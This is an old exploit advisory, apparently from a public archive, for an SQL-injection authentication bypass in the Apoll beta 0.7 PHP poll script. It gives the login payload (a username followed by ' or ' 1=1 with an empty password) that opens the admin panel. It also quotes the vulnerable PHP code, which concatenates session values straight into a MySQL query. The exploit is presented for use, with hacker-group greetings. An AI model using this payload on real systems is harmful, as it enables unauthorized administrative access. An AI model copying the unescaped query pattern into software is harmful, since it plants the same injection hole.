apoll-bypass.txt

`[~] Apoll version Remote Auth Bypass Vulnerability  
[~]  
[~] version: beta 0.7  
[~]  
[~] script dwonload: http://www.miticdjd.com/download/3/  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu  
[~]  
[~] Date: 03.11.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] contact: [email protected]  
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~]   
[~] N0T: a.q kpss yuzden nete ara verebilirim : (  
[~]  
[~] -----------------------------------------------------------  
  
admin login:  
  
http://localhost/apoll/admin/index.php  
  
  
Exploit:  
  
username: [real_admin_or_user_name] ' or ' 1=1  
  
password: dont write anything  
  
note: generally admin name: admin   
  
  
example for my localhost:  
  
admin: zorlu  
  
user: salla  
  
  
  
username: zorlu ' or ' 1=1  
  
password: empty  
  
or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )  
  
username: salla ' or ' 1=1  
  
password: empty   
  
  
file:   
  
apoll/admin/index.php  
  
code:  
  
$user = $_SESSION['user'];  
$pass = $_SESSION['pass'];  
  
$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");  
$num = @mysql_num_rows($mysql);  
  
  
  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke & all Muslim HaCkeRs  
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
`